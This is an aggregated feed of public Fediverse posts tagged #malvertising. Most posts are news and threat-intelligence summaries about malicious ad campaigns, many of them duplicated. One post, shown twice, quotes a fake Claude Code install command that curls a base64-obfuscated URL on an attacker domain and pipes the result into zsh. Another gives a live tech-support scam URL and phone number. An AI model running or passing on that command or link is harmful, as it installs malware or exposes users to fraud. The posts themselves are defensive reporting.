#malvertising — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #malvertising, aggregated by home.social.
-
Ad blocking keeps being treated as a preference, or as a small moral argument about whether a website gets paid. Here is why ad blockers will always stay relevant: the web's advertising machinery is also a security boundary, and that boundary keeps failing.
According to the article, Adform was compromised and began serving malicious ad code on 27 July. The nasty bit was not just tracking or a bad redirect: the code repeatedly swapped crypto wallet addresses in a victim's clipboard, so a pasted address could become the attacker's address instead.
The boring lesson is still the correct one. If third-party ad code can run in your browser, your threat model includes whoever managed to get into that ad pipeline today. The safer default is still to block the code before it gets a vote.
-
Ad blocking keeps being treated as a preference, or as a small moral argument about whether a website gets paid. Here is why ad blockers will always stay relevant: the web's advertising machinery is also a security boundary, and that boundary keeps failing.
According to the article, Adform was compromised and began serving malicious ad code on 27 July. The nasty bit was not just tracking or a bad redirect: the code repeatedly swapped crypto wallet addresses in a victim's clipboard, so a pasted address could become the attacker's address instead.
The boring lesson is still the correct one. If third-party ad code can run in your browser, your threat model includes whoever managed to get into that ad pipeline today. The safer default is still to block the code before it gets a vote.
-
Hinterlistiger Betrug mit ChatGPT - BSI - Newsletter Einfach • Cybersicher vom 01.07.2026 https://www.bsi.bund.de/DE/Service-Navi/Abonnements/Newsletter/Buerger-CERT-Abos/Newsletter-Einfach-Cybersicher/Einfach_Cybersicher_260701/_documents/Basics_3_Betrug_mit_ChatGPT.html #Malware #malvertising
-
Hinterlistiger Betrug mit ChatGPT - BSI - Newsletter Einfach • Cybersicher vom 01.07.2026 https://www.bsi.bund.de/DE/Service-Navi/Abonnements/Newsletter/Buerger-CERT-Abos/Newsletter-Einfach-Cybersicher/Einfach_Cybersicher_260701/_documents/Basics_3_Betrug_mit_ChatGPT.html #Malware #malvertising
-
FYI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. https://ppc.land/sourtrade-malvertising-builds-malware-inside-browsers-hits-12-countries/ #CyberSecurity #Malware #DigitalMarketing #Malvertising #AdTech
-
FYI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. https://ppc.land/sourtrade-malvertising-builds-malware-inside-browsers-hits-12-countries/ #CyberSecurity #Malware #DigitalMarketing #Malvertising #AdTech
-
ICYMI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. https://ppc.land/sourtrade-malvertising-builds-malware-inside-browsers-hits-12-countries/ #Malvertising #CyberSecurity #Malware #InternetSafety #AdTech
-
Online #ad firm #Adform’s script compromised to steal #cryptocurrency
-
Online #ad firm #Adform’s script compromised to steal #cryptocurrency
-
SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. https://ppc.land/sourtrade-malvertising-builds-malware-inside-browsers-hits-12-countries/ #Malvertising #SourTrade #CyberSecurity #Malware #OnlineSafety
-
SourTrade Browser-Based Malvertising: Secretly Assembles Infostealer Malware in Memory - https://www.redpacketsecurity.com/sourtrade-malvertising-campaign-secretly-builds-malware-in-the-browser/
#threatintel #in_memory_execution #malvertising #infostealer
-
SourTrade Browser-Based Malvertising: Secretly Assembles Infostealer Malware in Memory - https://www.redpacketsecurity.com/sourtrade-malvertising-campaign-secretly-builds-malware-in-the-browser/
#threatintel #in_memory_execution #malvertising #infostealer
-
Malvertising Sends Malware in Pieces, Then Makes the Browser Build the Executable https://thehackernews.com/2026/07/malvertising-sends-malware-in-pieces.html?m=1 #malvertising #malware
-
Malvertising Sends Malware in Pieces, Then Makes the Browser Build the Executable https://thehackernews.com/2026/07/malvertising-sends-malware-in-pieces.html?m=1 #malvertising #malware
-
Inside FakeAgent: How a Claude Desktop Malvertising Campaign Hit 29 Organizations with SectopRAT
Between July 21-22, 2026, 29 organizations were compromised through a sophisticated malvertising campaign exploiting Claude AI's legitimate domain. Victims searching for Claude Desktop via Bing encountered sponsored advertisements leading to a malicious Claude Artifact hosted on the authentic Claude.ai domain. This artifact redirected users to attacker-controlled infrastructure distributing a fake ClaudeDesktop.exe file containing SectopRAT. The malware employed advanced anti-analysis techniques including VMProtect packing, GPU-based virtual machine detection, and DirectX shader-based payload decryption. Command-and-control infrastructure utilized EtherHiding, storing C2 addresses in Ethereum blockchain transactions for resilience against takedowns. The remote access trojan exfiltrated credit card data, credentials, browser information, and personal files. Analysis revealed connections to previous campaigns dating to December 2025, with infrastructure linked to Operation Endgame seizures and StealC distrib...
Pulse ID: 6a616004250472ee87e19829
Pulse Link: https://otx.alienvault.com/pulse/6a616004250472ee87e19829
Pulse Author: AlienVault
Created: 2026-07-23 00:27:48Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CreditCard #CyberSecurity #EtherHiding #InfoSec #Mac #Malvertising #Malware #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Stealc #Trojan #Troll #bot #AlienVault
-
Inside FakeAgent: How a Claude Desktop Malvertising Campaign Hit 29 Organizations with SectopRAT
Between July 21-22, 2026, 29 organizations were compromised through a sophisticated malvertising campaign exploiting Claude AI's legitimate domain. Victims searching for Claude Desktop via Bing encountered sponsored advertisements leading to a malicious Claude Artifact hosted on the authentic Claude.ai domain. This artifact redirected users to attacker-controlled infrastructure distributing a fake ClaudeDesktop.exe file containing SectopRAT. The malware employed advanced anti-analysis techniques including VMProtect packing, GPU-based virtual machine detection, and DirectX shader-based payload decryption. Command-and-control infrastructure utilized EtherHiding, storing C2 addresses in Ethereum blockchain transactions for resilience against takedowns. The remote access trojan exfiltrated credit card data, credentials, browser information, and personal files. Analysis revealed connections to previous campaigns dating to December 2025, with infrastructure linked to Operation Endgame seizures and StealC distrib...
Pulse ID: 6a616004250472ee87e19829
Pulse Link: https://otx.alienvault.com/pulse/6a616004250472ee87e19829
Pulse Author: AlienVault
Created: 2026-07-23 00:27:48Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CreditCard #CyberSecurity #EtherHiding #InfoSec #Mac #Malvertising #Malware #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Stealc #Trojan #Troll #bot #AlienVault
-
Shared Claude Chats Meet ClickFix
A ClickFix campaign has been identified that abuses Anthropic's Claude platform through shareable chat links to distribute MacSync Stealer targeting macOS users. Attackers utilized malvertising with paid Google ads to direct victims searching for Claude-related terms to malicious shared Claude chats falsely labeled as 'Apple Support.' These chats contained obfuscated installation commands that, when executed, deployed a multi-stage infection chain. The malware steals credentials from browsers and password managers, cryptocurrency wallet data, sensitive files, and system information. The campaign ran from June 12-19, 2026, targeting primarily Mac users with Russian-language comments in the code suggesting Russian-speaking threat actors. Domains used adopted themes related to U.S. local services to appear legitimate.
Pulse ID: 6a57b1d61379f5309f46131d
Pulse Link: https://otx.alienvault.com/pulse/6a57b1d61379f5309f46131d
Pulse Author: AlienVault
Created: 2026-07-15 16:14:14Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #Google #GoogleAds #InfoSec #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #Password #Russia #Word #bot #cryptocurrency #AlienVault
-
Shared Claude Chats Meet ClickFix
A ClickFix campaign has been identified that abuses Anthropic's Claude platform through shareable chat links to distribute MacSync Stealer targeting macOS users. Attackers utilized malvertising with paid Google ads to direct victims searching for Claude-related terms to malicious shared Claude chats falsely labeled as 'Apple Support.' These chats contained obfuscated installation commands that, when executed, deployed a multi-stage infection chain. The malware steals credentials from browsers and password managers, cryptocurrency wallet data, sensitive files, and system information. The campaign ran from June 12-19, 2026, targeting primarily Mac users with Russian-language comments in the code suggesting Russian-speaking threat actors. Domains used adopted themes related to U.S. local services to appear legitimate.
Pulse ID: 6a57b1d61379f5309f46131d
Pulse Link: https://otx.alienvault.com/pulse/6a57b1d61379f5309f46131d
Pulse Author: AlienVault
Created: 2026-07-15 16:14:14Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #Google #GoogleAds #InfoSec #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #Password #Russia #Word #bot #cryptocurrency #AlienVault
-
Vidar Stealer and XMRig Miner Delivered via Fake Cracked Software
A newly identified malvertising campaign is delivering Vidar Stealer and the XMRig cryptominer to consumers and Small and Medium-sized Business (SMBs) worldwide.
Pulse ID: 6a558bf9f5b18c751ac306df
Pulse Link: https://otx.alienvault.com/pulse/6a558bf9f5b18c751ac306df
Pulse Author: cryptocti
Created: 2026-07-14 01:08:09Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CryptoMiner #CyberSecurity #InfoSec #Malvertising #OTX #OpenThreatExchange #SMB #Vidar #XMRigMiner #bot #cryptocti
-
Vidar Stealer and XMRig Miner Delivered via Fake Cracked Software
A newly identified malvertising campaign is delivering Vidar Stealer and the XMRig cryptominer to consumers and Small and Medium-sized Business (SMBs) worldwide.
Pulse ID: 6a558bf9f5b18c751ac306df
Pulse Link: https://otx.alienvault.com/pulse/6a558bf9f5b18c751ac306df
Pulse Author: cryptocti
Created: 2026-07-14 01:08:09Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CryptoMiner #CyberSecurity #InfoSec #Malvertising #OTX #OpenThreatExchange #SMB #Vidar #XMRigMiner #bot #cryptocti
-
…ed ecco l’ultima evoluzione di questo #scam nella sua versione italiana.
Questa volta la campagna viene servita direttamente all’interno dell’app de Il Post, tramite un annuncio pubblicitario che abusa dell’identità di la Repubblica e rimanda a un sito WordPress compromesso.
L’utente vede un contenuto apparentemente credibile, ma in realtà sta entrando in una classica catena di malvertising → fake news → scam cripto.
L’annuncio risulta distribuito tramite Google Ads. Le informazioni di trasparenza mostrano un inserzionista verificato da Google, ma il pagamento dell’annuncio è attribuito a un altro soggetto.
Questo evidenzia quanto sia difficile attribuire con certezza queste campagne e quanto sia importante analizzare l’intera filiera.
#italia #cryptoscam #IlPost #malvertising -
#NotNews24 | #UnbreaklingNotNewsNotNews... #IT's #DefinitelyNotNews; but #SomeNews...!
We #LearnedSomething... #Today...
#DidYouAlsoKnow that #Alia from #Dune was #CybillShepherd's #FictionalDaughter and a #VirtuosoPianist in #HerOwnRight in #RealLife...?
#BroughtToYou by #YouTube without the #SuperfluousAds and all the #Clickbait / #Malvertising...
🧙:fediverse:🤖:wolfparty:🤖:fediverse:🧙 | :PirateBadge:🐘🦹🦄🦹🐘:PirateBadge:
https://www.youtube.com/watch?v=eFYKkxdWV5U
#EuropeanServer #BeingEuropean #SomewhereInEurope #LemonadeStand #LemonUp #TrueStory #StillTrue #StillWorkingAsIntended #AsIntended #EULaw #ContainsZeropercentMastodonSocial #KazooTube #TheGhostOfMisterDen #Law #StillNoHitler #CrazyStalkerProblem #WhateverHappenedTo #vmst #NoOneCares #TheGhostOfMisterDenNeedsJesus #MastodonSocialNeedsJesus #MyDataIsMyData #MyDataIsStillMyData
-
#NotNews24 | #UnbreaklingNotNewsNotNews... #IT's #DefinitelyNotNews; but #SomeNews...!
We #LearnedSomething... #Today...
#DidYouAlsoKnow that #Alia from #Dune was #CybillShepherd's #FictionalDaughter and a #VirtuosoPianist in #HerOwnRight in #RealLife...?
#BroughtToYou by #YouTube without the #SuperfluousAds and all the #Clickbait / #Malvertising...
🧙:fediverse:🤖:wolfparty:🤖:fediverse:🧙 | :PirateBadge:🐘🦹🦄🦹🐘:PirateBadge:
https://www.youtube.com/watch?v=eFYKkxdWV5U
#EuropeanServer #BeingEuropean #SomewhereInEurope #LemonadeStand #LemonUp #TrueStory #StillTrue #StillWorkingAsIntended #AsIntended #EULaw #ContainsZeropercentMastodonSocial #KazooTube #TheGhostOfMisterDen #Law #StillNoHitler #CrazyStalkerProblem #WhateverHappenedTo #vmst #NoOneCares #TheGhostOfMisterDenNeedsJesus #MastodonSocialNeedsJesus #MyDataIsMyData #MyDataIsStillMyData
-
Have we #All had #AnotherPrideMonth yet, #Today...?
#DontPanic; #TheWombles are #InTheMatrix...
#TheWomblesOfWimbleshire... #GoingRural
#IT's #DefinitelyNotNews...
#IT #CouldBeWorse; your #DeadInstance could be #StillDead and your #ImaginaryJoySparkingBusiness could be #Worthless... #StillWorthless...
#That's #OK... #NoOneCares...
With #TheRightStaff™️
🧙⚔️🤖:wolfparty:🤖🛡️🧙 | :PirateBadge:🎠🦹🦄🦹🎠:PirateBadge:
#EuropeanServer #BeingEuropean #SomewhereInEurope #StayingEuropean #TheEuroverse #NoALTTextRequired #TooBusyForALTText #NoAgeVerificationRequired #TheInternetIsStillOn #PrivacyPolicy #Clickbait #Malvertising #YourAgeVerificationApp #WhateverHappenedTo #vmst #NoOneCares #TotalMowJuly #MyDataIsMyData #MyDataIsStillMyData #StillWorkingAsIntended #AsIntended #MastodonSocialNeedsJesus #MayContainsTracesOfAI #ContainsZeroPercentMastodonSocial #SonyExclusives #DolbyDigital #UltraHD #4KFormat #EverythingIsStillBon #EUTube #PewPewPewTube #RedBeanBear #StillRed #CaptainRedBeanBear #FictionalCommunityManager #WhatsUpBro #Paladins #ComingBackInFashion #Notflix #TheFabianSociety #LSE
-
Have we #All had #AnotherPrideMonth yet, #Today...?
#DontPanic; #TheWombles are #InTheMatrix...
#TheWomblesOfWimbleshire... #GoingRural
#IT's #DefinitelyNotNews...
#IT #CouldBeWorse; your #DeadInstance could be #StillDead and your #ImaginaryJoySparkingBusiness could be #Worthless... #StillWorthless...
#That's #OK... #NoOneCares...
With #TheRightStaff™️
🧙⚔️🤖:wolfparty:🤖🛡️🧙 | :PirateBadge:🎠🦹🦄🦹🎠:PirateBadge:
#EuropeanServer #BeingEuropean #SomewhereInEurope #StayingEuropean #TheEuroverse #NoALTTextRequired #TooBusyForALTText #NoAgeVerificationRequired #TheInternetIsStillOn #PrivacyPolicy #Clickbait #Malvertising #YourAgeVerificationApp #WhateverHappenedTo #vmst #NoOneCares #TotalMowJuly #MyDataIsMyData #MyDataIsStillMyData #StillWorkingAsIntended #AsIntended #MastodonSocialNeedsJesus #MayContainsTracesOfAI #ContainsZeroPercentMastodonSocial #SonyExclusives #DolbyDigital #UltraHD #4KFormat #EverythingIsStillBon #EUTube #PewPewPewTube #RedBeanBear #StillRed #CaptainRedBeanBear #FictionalCommunityManager #WhatsUpBro #Paladins #ComingBackInFashion #Notflix #TheFabianSociety #LSE
-
Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽
We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️
While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.
Some examples from the domains we've uncovered so far:
:Dropcatch domains host or redirect to illegal streaming services
autoredistrict[.]org
childreninachangingclimate[.]org
2026worldcupnorthamerica[.]com
folsomprisonmuseum[.]org
allaboutbasketball[.]us
thebreastcancercharities[.]org:Fraudulent domains host or redirect to illegal streaming services
90phutaa[.]cc
90phutab[.]cc
90phutac[.]cc
xoilaczzzzw[.]tv
xoilaczzzzt[.]tv
xoilaczzzzh[.]tv:Lookalike domains used by the betting platforms
fifa001[.]com
fifa002[.]com
fifa02[.]com
worldcup00[.]com
worldcup000[.]com
worldcup02[.]com#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut
-
Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽
We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️
While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.
Some examples from the domains we've uncovered so far:
:Dropcatch domains host or redirect to illegal streaming services
autoredistrict[.]org
childreninachangingclimate[.]org
2026worldcupnorthamerica[.]com
folsomprisonmuseum[.]org
allaboutbasketball[.]us
thebreastcancercharities[.]org:Fraudulent domains host or redirect to illegal streaming services
90phutaa[.]cc
90phutab[.]cc
90phutac[.]cc
xoilaczzzzw[.]tv
xoilaczzzzt[.]tv
xoilaczzzzh[.]tv:Lookalike domains used by the betting platforms
fifa001[.]com
fifa002[.]com
fifa02[.]com
worldcup00[.]com
worldcup000[.]com
worldcup02[.]com#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut
-
Malvertising Campaign Spreads FlutterShell Backdoor to macOS Users
macOS users beware: a sneaky malware called FlutterShell is spreading through malicious ads and infected desktop apps, allowing hackers to take control of your device and steal sensitive data. This stealthy backdoor can execute commands, access files, and even siphon off browser session info - all while masquerading as legitimate software.
-
Malvertising Campaign Targets macOS with FlutterShell Backdoor
Google swiftly suspended advertiser accounts linked to a massive malvertising campaign that spread a new macOS backdoor, known as FlutterShell, after researchers sounded the alarm. The culprits, tracked by Palo Alto Networks as CL-CRI-1089, used hundreds of verified Google ads and a web of shell companies to deceive ad networks.
#Macos #Malvertising #FluttershellBackdoor #Clcri1089 #GoogleAds
-
The top result for "claude code" on Google right now is malvertising. We are so cooked.
anvil-89[.]com
sites[.]google[.]com/newappclaude.com/clau-ver-un-30```
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
```#Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel
-
The top result for "claude code" on Google right now is malvertising. We are so cooked.
anvil-89[.]com
sites[.]google[.]com/newappclaude.com/clau-ver-un-30```
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
```#Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel
-
@kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality for which most current #Brave users presumably intend to attain by installing Brave?
I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.
A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.
-
@kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality for which most current #Brave users presumably intend to attain by installing Brave?
I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.
A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.
-
Verbraucherschützer kritisieren mangelndes Vorgehen gegen Finanzbetrug | heise online https://www.heise.de/news/Europaweite-Beschwerden-gegen-Finanzwerbung-bei-Google-Co-11302016.html #DSA #DigitalServicesAct #Werbung #advertising #malvertising
-
Verbraucherschützer kritisieren mangelndes Vorgehen gegen Finanzbetrug | heise online https://www.heise.de/news/Europaweite-Beschwerden-gegen-Finanzwerbung-bei-Google-Co-11302016.html #DSA #DigitalServicesAct #Werbung #advertising #malvertising
-
Malvertisers Exploit Code Signing in TamperedChef Malware Campaigns
Meet the sneaky malware campaign that's been flying under the radar, leveraging polished marketing tactics and code signing to spread its malicious reach - with over 4,000 samples and 100 unique variants uncovered across three distinct clusters of activity.
#TamperedchefMalware #CodeSigning #MalwareOperations #Malvertising #PaloAltoNetworks
-
Malicious Android Apps Fuel 659M Daily Ad Fraud Bid Requests
Meet Trapdoor, a massive ad fraud scam driven by 455 malicious Android apps that generated a whopping 659 million daily bid requests at its peak, all while hiding in plain sight as harmless utilities like PDF viewers and file managers. These fake apps tricked users into installing malware, unleashing a hidden ad fraud operation…
#AdFraud #Malvertising #AndroidMalware #MobileSecurity #EmergingThreats
-
Trapdoor Android Ad Fraud Scheme Exposes 455 Malicious Apps
Meet Trapdoor, a massive Android ad fraud scheme that used 455 malicious apps to generate a staggering 659 million daily bid requests, fueling a self-sustaining machine that turned innocent installs into big bucks. This complex operation was uncovered by HUMAN's Satori Threat Intelligence and Research Team, shedding light on a pipeline for…
#AndroidAdFraud #Malvertising #Trapdoor #MobileSecurity #AdFraud
-
#Google’s #Gemini blocked billions of bad ads. That’s good news — but not enough
https://adguard.com/en/blog/google-report-gemini-blocked-billions-bad-ads.html
-
#Google’s #Gemini blocked billions of bad ads. That’s good news — but not enough
https://adguard.com/en/blog/google-report-gemini-blocked-billions-bad-ads.html
-
Hackers are abusing the popularity of AI tools with a fake #ClaudeAI website that spreads a newly discovered backdoor called #Beagle. The campaign uses DLL sideloading, #malvertising, and trusted signed files to infect Windows systems.
Read: https://hackread.com/hackers-fake-claude-ai-site-infect-beagle-malware/
-
Hackers are abusing the popularity of AI tools with a fake #ClaudeAI website that spreads a newly discovered backdoor called #Beagle. The campaign uses DLL sideloading, #malvertising, and trusted signed files to infect Windows systems.
Read: https://hackread.com/hackers-fake-claude-ai-site-infect-beagle-malware/
-
Malicious Site Exploits AI Interest to Deploy Beagle Backdoor
Beware of a fake website masquerading as Anthropic's Claude interface, tricking users into downloading a 505 MB ZIP archive that unleashes a new, previously undocumented Windows backdoor called Beagle. This malicious campaign uses a convincing imitation of the legitimate site to spread the infection.
#BeagleBackdoor #AiMalware #WindowsMalware #Malvertising #DllSideloading
-
MakeUseOf: Homebrew users are accidentally downloading malware instead of the real app. “A malicious Google ad campaign is targeting users of a popular free, open-source software package manager for macOS and Linux that simplifies installing, updating, and managing command-line tools. Your password and personal data could be at serious risk.”
https://rbfirehose.com/2026/05/05/makeuseof-homebrew-users-are-accidentally-downloading-malware-instead-of-the-real-app/ -
MakeUseOf: Homebrew users are accidentally downloading malware instead of the real app. “A malicious Google ad campaign is targeting users of a popular free, open-source software package manager for macOS and Linux that simplifies installing, updating, and managing command-line tools. Your password and personal data could be at serious risk.”
https://rbfirehose.com/2026/05/05/makeuseof-homebrew-users-are-accidentally-downloading-malware-instead-of-the-real-app/ -
And now a funny commentary. This guy from India or Russia or whatever spent quite literally 3-4 HOURS with my 93-year-old mom trying to get her to install stuff, share her screen, and get through a password change. In that time she managed to install 2 apps and change TWO passwords. That’s it.
He should have been some kind of priest, rabbi, or imam or something. Patience. Of. A. Saint. Sad to think of this amazing super power going to waste on a life of crime.
I have to do these things with her and I can’t get them done any faster than that. But I don’t have the stamina to go 4 hours in the ring with her. 😜 This guy is impressive.
#identitytheft #malvertising #security -
If anyone wants to see the scam that got my mom, here's a video capture of what it does. It plays a computer voice saying fantastic bullshit like "Your computer has the identity theft virus".
I'm pretty sure this was malvertising. Looking at her safari history, she was on a grocery store web site trying to place an order. Then this URL is next in the history. And after that, it's all password change pages and such. I can't imagine she had any reason to click on something other than seeing a fake "security alert."
In the video, this is not fullscreen. But when I clicked that link, it went full screen.
What the hell, Paco, you clicked the damn link? Yeah, not on purpose. I was trying to right click it to copy it, and either TeamViewer misunderstood the click or I fat-fingered it. But, having made the mistake, I decided to shoot some video. I got lucky.
Here's the URL (still live as of about 60 minutes ago):
https: / / xdrty-c6e6cjecbve4f9bz,z02,azurefd,net/mhelpxxx/index,html?bcda=1-833-371-8269#%E2%80%99
#identitytheft #malvertising -
#Google :google: blockierte 2025 mit KI-Hilfe mehr als 8 Milliarden Werbeanzeigen | Security https://www.heise.de/news/Google-blockierte-2025-mit-KI-Hilfe-mehr-als-8-Milliarden-Werbeanzeigen-11265928.html #Werbung #advertising #malvertising #ArtificialIntelligence #AI #GoogleGemini #Gemini
-
SmokedHam e UNC2465: il backdoor dei ransomware operator che si nasconde nei tool IT più usati dagli amministratori
Orange Cyberdefense ha documentato una campagna di malvertising attiva nel 2026 in cui UNC2465, gruppo affiliato a DarkSide, LockBit e Qilin, distribuisce il backdoor SmokedHam tramite falsi installer di PuTTY, RVTools e altri tool IT. L'obiettivo finale è il ransomware. -
Fałszywe strony Claude Code w sponsorowanych wynikach dostarczają malware
Badacze bezpieczeństwa z Push Security odkryli nową kampanię fałszywych stron, które podszywają się pod popularne narzędzia takie jak Claude Code. Na stronach zamieszczone są instrukcje instalacji, nakłaniające ofiary (przekonane, że uruchamiają wiarygodny program) do instalowania złośliwego oprogramowania. Strony te są promowane w Google Ads, dzięki czemu pojawiają się wysoko w...
#WBiegu #Claude #Installfix #Malvertising #Malware
https://sekurak.pl/falszywe-strony-claude-code-w-sponsorowanych-wynikach-dostarczaja-malware/
-
We planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.
If you hunt threats distributed via adtech, these indicators can be useful pivots. https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/
#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting